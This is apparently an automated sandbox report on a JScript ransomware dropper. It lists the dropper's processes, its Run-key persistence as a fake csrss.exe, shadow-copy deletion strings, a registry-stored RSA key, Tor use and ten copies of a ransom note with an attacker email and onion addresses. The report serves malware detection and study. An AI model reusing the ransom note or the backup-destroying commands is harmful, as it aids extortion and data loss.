Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_0040AC3A __EH_prolog,_memset,SystemParametersInfoW,SystemParametersInfoW,6_2_0040AC3A
Deletes shadow drive data (may be related to ransomware)Show sources
Source: rad8AE2B.tmp, 00000006.00000002.9817520638.00000000005E5000.00000040.sdmpBinary or memory string: vssadmin.exediskshadow.exeList ShadowsDelete Shadows /All /QuietDELETE SHADOWS ALLrunas/s ROOT\CIMV2WQLAVAST
Source: csrss.exe, 00000007.00000002.8969607892.00000000005E5000.00000040.sdmpBinary or memory string: vssadmin.exediskshadow.exeList ShadowsDelete Shadows /All /QuietDELETE SHADOWS ALLrunas/s ROOT\CIMV2WQLAVAST
Source: csrss.exe, 0000000A.00000002.9035702562.00000000005E5000.00000040.sdmpBinary or memory string: vssadmin.exediskshadow.exeList ShadowsDelete Shadows /All /QuietDELETE SHADOWS ALLrunas/s ROOT\CIMV2WQLAVAST
Source: vssadmin.exe, 0000000B.00000002.9235529825.0000014252810000.00000002.sdmpBinary or memory string: Example Usage: vssadmin Delete ShadowStorage
Source: vssadmin.exe, 0000000B.00000002.9235529825.0000014252810000.00000002.sdmpBinary or memory string: Example Usage: vssadmin Delete Shadows /Type=ClientAccessible /For=C:
Source: vssadmin.exe, 0000000B.00000002.9235529825.0000014252810000.00000002.sdmpBinary or memory string: vssadmin Delete Shadows
Source: vssadmin.exe, 0000000B.00000002.9235529825.0000014252810000.00000002.sdmpBinary or memory string: Example Usage: vssadmin Delete Shadows /For=C: /Oldest
Source: vssadmin.exe, 0000000B.00000002.9235529825.0000014252810000.00000002.sdmpBinary or memory string: Example Usage: vssadmin Delete ShadowStorage /For=C: /On=D:
May disable shadow drive data (uses vssadmin)Show sources
Source: unknownProcess created: C:\Windows\System32\vssadmin.exe C:\Windows\system32\vssadmin.exe List Shadows
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpProcess created: C:\Windows\System32\vssadmin.exe C:\Windows\system32\vssadmin.exe List ShadowsJump to behavior
Stores a public key to the registry (likely related to ransomware)Show sources
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\System32\Configuration xpk -----BEGIN PUBLIC KEY-----.MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAuMvPzsg9YKThUzNOe0gu.ocFHkb/ddeVcFM9hvxOdSlW+IC3ufEPm2Lk8WyGM/YmbWKYF5IY4vARgECNRgBdA.YQUgOU01lHaATshh/naVOAloTyjMfzGhyOpqW4BT+YZ9Zd6AmpAQred1k6iLnqmn.ojKRGJBqgk+VSw+wVGEmUOUkuRqruBrwbYjuJ+akjKpgxRiKwvKrEd4Uz7g/o316.vXngIatV+AOvvNOqmmq4HmA/VoUN067qrYBdTSrWEShuCzEKRyzvt96O5i2HhSTK.kJ2oun+Atfjy7TZ0V06pfh7sqcJxgCgwtyOXeAfcBnX/XpLuZL6/n0n/If9uSSuY.ajt0Ym8w2YPbWYOima4uSpmG3hU7pUZXdg3pyHwUCQHeK8gj1nWs/yZ5uczMJCyj.Yvqkb2ci1l5L63nqmsXziM70zF7JhybItPZJBzXjZ8Jds07jpGrD+fcATVNXe8K0.AEb3o0eTI8WTWjgLJJ+H6LlloBAzP/lZYm0Y2rYVgc8PAgMBAAE=.-----END PUBLIC KEY-----.Jump to behavior
Writes a notice file (html or txt) to demand a ransomShow sources
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile dropped: C:\README1.txt -> decrypt the files you should send the following code:6c39d71348cd950d5b0c|0to e-mail address pilotpilot088@gmail.com .then you will receive all necessary instructions.all the attempts of decryption by yourself will result only in irrevocable loss of your data.if you still want to try to decrypt them by yourself please make a backup at first becausethe decryption will become impossible in case of any changes inside the files.if you did not receive the answer from the aforecited email for more than 48 hours (and only in this case!),use the feedback form. you can do it by two ways:1) download tor browser from here:https://www.torproject.org/download/download-easy.html.eninstall it and type the following address into the address bar:http://cryptsen7fo43rr6.onion/press enter and then the page with feedback form will be loaded.2) go to the one of the following addresses in any browser:http://cryptsen7fo43rr6.onion.to/http://cryptsen7fo43rr6.onion.cab/Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile dropped: C:\README2.txt -> decrypt the files you should send the following code:6c39d71348cd950d5b0c|0to e-mail address pilotpilot088@gmail.com .then you will receive all necessary instructions.all the attempts of decryption by yourself will result only in irrevocable loss of your data.if you still want to try to decrypt them by yourself please make a backup at first becausethe decryption will become impossible in case of any changes inside the files.if you did not receive the answer from the aforecited email for more than 48 hours (and only in this case!),use the feedback form. you can do it by two ways:1) download tor browser from here:https://www.torproject.org/download/download-easy.html.eninstall it and type the following address into the address bar:http://cryptsen7fo43rr6.onion/press enter and then the page with feedback form will be loaded.2) go to the one of the following addresses in any browser:http://cryptsen7fo43rr6.onion.to/http://cryptsen7fo43rr6.onion.cab/Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile dropped: C:\README3.txt -> decrypt the files you should send the following code:6c39d71348cd950d5b0c|0to e-mail address pilotpilot088@gmail.com .then you will receive all necessary instructions.all the attempts of decryption by yourself will result only in irrevocable loss of your data.if you still want to try to decrypt them by yourself please make a backup at first becausethe decryption will become impossible in case of any changes inside the files.if you did not receive the answer from the aforecited email for more than 48 hours (and only in this case!),use the feedback form. you can do it by two ways:1) download tor browser from here:https://www.torproject.org/download/download-easy.html.eninstall it and type the following address into the address bar:http://cryptsen7fo43rr6.onion/press enter and then the page with feedback form will be loaded.2) go to the one of the following addresses in any browser:http://cryptsen7fo43rr6.onion.to/http://cryptsen7fo43rr6.onion.cab/Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile dropped: C:\README4.txt -> decrypt the files you should send the following code:6c39d71348cd950d5b0c|0to e-mail address pilotpilot088@gmail.com .then you will receive all necessary instructions.all the attempts of decryption by yourself will result only in irrevocable loss of your data.if you still want to try to decrypt them by yourself please make a backup at first becausethe decryption will become impossible in case of any changes inside the files.if you did not receive the answer from the aforecited email for more than 48 hours (and only in this case!),use the feedback form. you can do it by two ways:1) download tor browser from here:https://www.torproject.org/download/download-easy.html.eninstall it and type the following address into the address bar:http://cryptsen7fo43rr6.onion/press enter and then the page with feedback form will be loaded.2) go to the one of the following addresses in any browser:http://cryptsen7fo43rr6.onion.to/http://cryptsen7fo43rr6.onion.cab/Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile dropped: C:\README5.txt -> decrypt the files you should send the following code:6c39d71348cd950d5b0c|0to e-mail address pilotpilot088@gmail.com .then you will receive all necessary instructions.all the attempts of decryption by yourself will result only in irrevocable loss of your data.if you still want to try to decrypt them by yourself please make a backup at first becausethe decryption will become impossible in case of any changes inside the files.if you did not receive the answer from the aforecited email for more than 48 hours (and only in this case!),use the feedback form. you can do it by two ways:1) download tor browser from here:https://www.torproject.org/download/download-easy.html.eninstall it and type the following address into the address bar:http://cryptsen7fo43rr6.onion/press enter and then the page with feedback form will be loaded.2) go to the one of the following addresses in any browser:http://cryptsen7fo43rr6.onion.to/http://cryptsen7fo43rr6.onion.cab/Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile dropped: C:\README6.txt -> decrypt the files you should send the following code:6c39d71348cd950d5b0c|0to e-mail address pilotpilot088@gmail.com .then you will receive all necessary instructions.all the attempts of decryption by yourself will result only in irrevocable loss of your data.if you still want to try to decrypt them by yourself please make a backup at first becausethe decryption will become impossible in case of any changes inside the files.if you did not receive the answer from the aforecited email for more than 48 hours (and only in this case!),use the feedback form. you can do it by two ways:1) download tor browser from here:https://www.torproject.org/download/download-easy.html.eninstall it and type the following address into the address bar:http://cryptsen7fo43rr6.onion/press enter and then the page with feedback form will be loaded.2) go to the one of the following addresses in any browser:http://cryptsen7fo43rr6.onion.to/http://cryptsen7fo43rr6.onion.cab/Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile dropped: C:\README7.txt -> decrypt the files you should send the following code:6c39d71348cd950d5b0c|0to e-mail address pilotpilot088@gmail.com .then you will receive all necessary instructions.all the attempts of decryption by yourself will result only in irrevocable loss of your data.if you still want to try to decrypt them by yourself please make a backup at first becausethe decryption will become impossible in case of any changes inside the files.if you did not receive the answer from the aforecited email for more than 48 hours (and only in this case!),use the feedback form. you can do it by two ways:1) download tor browser from here:https://www.torproject.org/download/download-easy.html.eninstall it and type the following address into the address bar:http://cryptsen7fo43rr6.onion/press enter and then the page with feedback form will be loaded.2) go to the one of the following addresses in any browser:http://cryptsen7fo43rr6.onion.to/http://cryptsen7fo43rr6.onion.cab/Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile dropped: C:\README8.txt -> decrypt the files you should send the following code:6c39d71348cd950d5b0c|0to e-mail address pilotpilot088@gmail.com .then you will receive all necessary instructions.all the attempts of decryption by yourself will result only in irrevocable loss of your data.if you still want to try to decrypt them by yourself please make a backup at first becausethe decryption will become impossible in case of any changes inside the files.if you did not receive the answer from the aforecited email for more than 48 hours (and only in this case!),use the feedback form. you can do it by two ways:1) download tor browser from here:https://www.torproject.org/download/download-easy.html.eninstall it and type the following address into the address bar:http://cryptsen7fo43rr6.onion/press enter and then the page with feedback form will be loaded.2) go to the one of the following addresses in any browser:http://cryptsen7fo43rr6.onion.to/http://cryptsen7fo43rr6.onion.cab/Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile dropped: C:\README9.txt -> decrypt the files you should send the following code:6c39d71348cd950d5b0c|0to e-mail address pilotpilot088@gmail.com .then you will receive all necessary instructions.all the attempts of decryption by yourself will result only in irrevocable loss of your data.if you still want to try to decrypt them by yourself please make a backup at first becausethe decryption will become impossible in case of any changes inside the files.if you did not receive the answer from the aforecited email for more than 48 hours (and only in this case!),use the feedback form. you can do it by two ways:1) download tor browser from here:https://www.torproject.org/download/download-easy.html.eninstall it and type the following address into the address bar:http://cryptsen7fo43rr6.onion/press enter and then the page with feedback form will be loaded.2) go to the one of the following addresses in any browser:http://cryptsen7fo43rr6.onion.to/http://cryptsen7fo43rr6.onion.cab/Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile dropped: C:\README10.txt -> decrypt the files you should send the following code:6c39d71348cd950d5b0c|0to e-mail address pilotpilot088@gmail.com .then you will receive all necessary instructions.all the attempts of decryption by yourself will result only in irrevocable loss of your data.if you still want to try to decrypt them by yourself please make a backup at first becausethe decryption will become impossible in case of any changes inside the files.if you did not receive the answer from the aforecited email for more than 48 hours (and only in this case!),use the feedback form. you can do it by two ways:1) download tor browser from here:https://www.torproject.org/download/download-easy.html.eninstall it and type the following address into the address bar:http://cryptsen7fo43rr6.onion/press enter and then the page with feedback form will be loaded.2) go to the one of the following addresses in any browser:http://cryptsen7fo43rr6.onion.to/http://cryptsen7fo43rr6.onion.cab/Jump to dropped file

System Summary:

barindex
Contains functionality to communicate with device driversShow sources
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_00417871: CreateFileW,DeviceIoControl,CloseHandle,6_2_00417871
Creates mutexesShow sources
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4900:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:964:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4828:120:WilError_01
Detected potential crypto functionShow sources
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_004182F76_2_004182F7
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_00412CBF6_2_00412CBF
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_00416D6D6_2_00416D6D
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_00478E5B6_2_00478E5B
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_004133756_2_00413375
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_004095196_2_00409519
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_00407B256_2_00407B25
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_00405D996_2_00405D99
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_0044BEFB6_2_0044BEFB
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_00417EB56_2_00417EB5
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_005700E06_2_005700E0
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_0046216A6_2_0046216A
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_005782176_2_00578217
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_005702E06_2_005702E0
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_0047C2956_2_0047C295
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_005624816_2_00562481
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_0056455E6_2_0056455E
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_004585916_2_00458591
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_005786006_2_00578600
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_004126996_2_00412699
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_005728866_2_00572886
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_004249306_2_00424930
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_0055CA566_2_0055CA56
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_00578BC06_2_00578BC0
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_00448BF06_2_00448BF0
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_0040AC3A6_2_0040AC3A
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_0055AD616_2_0055AD61
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_00574D006_2_00574D00
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_00578D006_2_00578D00
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_00414D816_2_00414D81
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_00572EF96_2_00572EF9
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_00578E806_2_00578E80
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_00562F096_2_00562F09
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_005211716_2_00521171
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_005731806_2_00573180
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_004411B76_2_004411B7
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_0041D2116_2_0041D211
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_005712306_2_00571230
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_005752906_2_00575290
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: String function: 005501C8 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: String function: 004427B6 appears 79 times
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: String function: 0040383F appears 59 times
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: String function: 005188C9 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: String function: 0056F5DC appears 152 times
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: String function: 0055E5C0 appears 151 times
Java / VBScript file with very long strings (likely obfuscated code)Show sources
Source: 21#U043e #U0437#U0430#U043a#U0430#U0437#U0435.jsInitial sample: Strings found which are bigger than 50
Reads the hosts fileShow sources
Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Tries to load missing DLLsShow sources
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpSection loaded: wow64log.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpSection loaded: cscapi.dllJump to behavior
Source: C:\ProgramData\Windows\csrss.exeSection loaded: wow64log.dllJump to behavior
Source: C:\ProgramData\Windows\csrss.exeSection loaded: wow64log.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64log.dll
Source: C:\Windows\SysWOW64\chcp.comSection loaded: wow64log.dll
Classification labelShow sources
Source: classification engineClassification label: mal100.rans.troj.evad.winJS@16/229@12/11
Contains functionality to enum processes or threadsShow sources
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_00449089 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,_memset,GetTickCount,GetTickCount,Heap32ListFirst,_memset,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,Process32Next,GetTickCount,GetTickCount,Thread32First,Thread32Next,GetTickCount,GetTickCount,Module32First,Module32Next,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,6_2_00449089
Creates files inside the user directoryShow sources
Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DBB5U303\messg[1].jpgJump to behavior
Creates temporary filesShow sources
Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user~1\AppData\Local\Temp\rad8AE2B.tmpJump to behavior
Reads ini filesShow sources
Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\SysWOW64\wscript.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Spawns processesShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\21#U043e #U0437#U0430#U043a#U0430#U0437#U0435.js'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c C:\Users\user~1\AppData\Local\Temp\rad8AE2B.tmp
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp C:\Users\user~1\AppData\Local\Temp\rad8AE2B.tmp
Source: unknownProcess created: C:\ProgramData\Windows\csrss.exe 'C:\ProgramData\Windows\csrss.exe'
Source: unknownProcess created: C:\ProgramData\Windows\csrss.exe 'C:\ProgramData\Windows\csrss.exe'
Source: unknownProcess created: C:\Windows\System32\vssadmin.exe C:\Windows\system32\vssadmin.exe List Shadows
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknownProcess created: C:\Windows\SysWOW64\chcp.com chcp
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c C:\Users\user~1\AppData\Local\Temp\rad8AE2B.tmpJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp C:\Users\user~1\AppData\Local\Temp\rad8AE2B.tmpJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpProcess created: C:\Windows\System32\vssadmin.exe C:\Windows\system32\vssadmin.exe List ShadowsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected

Data Obfuscation:

barindex
JScript performs obfuscated calls to suspicious functionsShow sources
Source: C:\Windows\SysWOW64\wscript.exeAnti Malware Scan Interface: .Run("cmd.exe /c C:\Users\user~1\AppData\Local\Temp\rad8AE2B.tmp", "0");StringStringStringStringStringStringStringStringStringStringStringStringStringStringStringStringStringStringStringStringStringStringStringStrin
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_0041A13C LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetP6_2_0041A13C
PE file contains an invalid checksumShow sources
Source: rad8AE2B.tmp.1.drStatic PE information: real checksum: 0x185938 should be: 0x17b94a
Source: messg[1].jpg.1.drStatic PE information: real checksum: 0x185938 should be: 0x17b94a
Source: csrss.exe.6.drStatic PE information: real checksum: 0x185938 should be: 0x17b94a
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Windows\SysWOW64\wscript.exeCode function: 1_2_052FAFCF push es; retf 1_2_052FB25D
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_0055020D push ecx; ret 6_2_00550220
Source: C:\ProgramData\Windows\csrss.exeCode function: 7_2_028D40E0 push edx; ret 7_2_028D41F1
Source: C:\ProgramData\Windows\csrss.exeCode function: 7_2_028D4080 push edx; ret 7_2_028D408B
Source: C:\ProgramData\Windows\csrss.exeCode function: 10_2_028D40E0 push edx; ret 10_2_028D41F1
Source: C:\ProgramData\Windows\csrss.exeCode function: 10_2_028D4080 push edx; ret 10_2_028D408B
Source: C:\ProgramData\Windows\csrss.exeCode function: 10_1_00566120 push edx; ret 10_1_0056647D
Source: C:\ProgramData\Windows\csrss.exeCode function: 10_1_00417D4A push ebx; ret 10_1_00417D4B
Source: C:\ProgramData\Windows\csrss.exeCode function: 10_1_00416108 push ebp; retf 10_1_00416109
Source: C:\ProgramData\Windows\csrss.exeCode function: 10_1_004149CC pushad ; retf 10_1_004149CD

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile created: C:\ProgramData\Windows\csrss.exeJump to dropped file
Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user~1\AppData\Local\Temp\rad8AE2B.tmpJump to dropped file
Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DBB5U303\messg[1].jpg
Drops PE files to the application program directory (C:\ProgramData)Show sources
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile created: C:\ProgramData\Windows\csrss.exeJump to dropped file
Drops files with a non-matching file extension (content does not match file extension)Show sources
Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DBB5U303\messg[1].jpg
Creates license or readme fileShow sources
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile created: C:\README1.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile created: C:\README2.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile created: C:\README3.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile created: C:\README4.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile created: C:\README5.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile created: C:\README6.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile created: C:\README7.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile created: C:\README8.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile created: C:\README9.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile created: C:\README10.txtJump to behavior

Boot Survival:

barindex
Creates an autostart registry keyShow sources
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Client Server Runtime SubsystemJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Client Server Runtime SubsystemJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Deletes itself after installationShow sources
Source: C:\Windows\SysWOW64\wscript.exeFile deleted: c:\users\user\desktop\21#u043e #u0437#u0430#u043a#u0430#u0437#u0435.jsJump to behavior
May use the Tor software to hide its network trafficShow sources
Source: rad8AE2B.tmp, csrss.exe, 00000007.00000002.8957279020.0000000000400000.00000040.sdmp, csrss.exe, 0000000A.00000002.9032107262.0000000000400000.00000040.sdmpBinary or memory string: onion-port
Extensive use of GetProcAddress (often used to hide API calls)Show sources
